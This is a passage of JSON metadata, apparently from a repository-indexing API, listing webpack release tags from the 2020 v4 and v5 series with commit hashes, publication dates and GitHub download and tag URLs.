ack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0